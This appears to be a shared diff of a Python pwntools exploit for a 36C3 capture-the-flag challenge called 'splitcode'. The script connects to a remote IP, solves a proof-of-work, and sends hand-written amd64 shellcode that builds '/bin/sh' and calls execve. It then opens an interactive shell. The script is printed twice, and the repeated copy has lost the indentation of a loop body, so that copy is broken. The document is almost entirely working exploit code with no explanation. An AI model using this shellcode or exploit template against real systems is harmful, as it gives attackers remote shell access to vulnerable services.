kokjo · December 29, 2019 20:08
diff --git a/doit-splitcode-36c3.py b/doit-splitcode-36c3.py
 #!/usr/bin/env python
 from pwn import *
 from subprocess import Popen, PIPE
 context(arch='amd64', os='linux', terminal=['sakura','-x'])

 r = remote("78.46.163.223", 1336)
 r.recvuntil('"')
 hsh = r.recvuntil('"')[:-1]
 r.recvuntil("ends with ")
 num = r.recvuntil(' ')
 r.recvline()
 proc = Popen("./pow-solver %d %s" % (int(num), hsh), shell=True, bufsize=1, stdout=PIPE)
 res = ''
 for line in proc.stdout:
    res = line
    break
 r.sendline(res.strip())

 magic = 0x3A248CA1
 shellcode = asm('''
    xor edi, eax
    mov cl, 16
    mov bl, 0x24
    mov bh, 0x3a
    rol ebx, cl
    xor edi, ebx
    mov esp, edi

    mov al, 0x2f
    mov ah, 0x62
    stosw
    mov ah, 0x73
    shl eax, cl
    mov al, 0x69
    mov ah, 0x6e
    stosd
    cdq
    mov al, 0x68
    stosb
    nop
    mov edi, esp
    pop rax
    pop rax
    pop rsi
    nop
    add al, 0x3b
 ''').ljust(42, '\x90')

 print shellcode

 r.sendline(shellcode)
 r.sendline("ls -la")
 r.interactive()
	#!/usr/bin/env python
	from pwn import *
	from subprocess import Popen, PIPE
	context(arch='amd64', os='linux', terminal=['sakura','-x'])

	r = remote("78.46.163.223", 1336)
	r.recvuntil('"')
	hsh = r.recvuntil('"')[:-1]
	r.recvuntil("ends with ")
	num = r.recvuntil(' ')
	r.recvline()
	proc = Popen("./pow-solver %d %s" % (int(num), hsh), shell=True, bufsize=1, stdout=PIPE)
	res = ''
	for line in proc.stdout:
	res = line
	break
	r.sendline(res.strip())

	magic = 0x3A248CA1
	shellcode = asm('''
	xor edi, eax
	mov cl, 16
	mov bl, 0x24
	mov bh, 0x3a
	rol ebx, cl
	xor edi, ebx
	mov esp, edi

	mov al, 0x2f
	mov ah, 0x62
	stosw
	mov ah, 0x73
	shl eax, cl
	mov al, 0x69
	mov ah, 0x6e
	stosd
	cdq
	mov al, 0x68
	stosb
	nop
	mov edi, esp
	pop rax
	pop rax
	pop rsi
	nop
	add al, 0x3b
	''').ljust(42, '\x90')

	print shellcode

	r.sendline(shellcode)
	r.sendline("ls -la")
	r.interactive()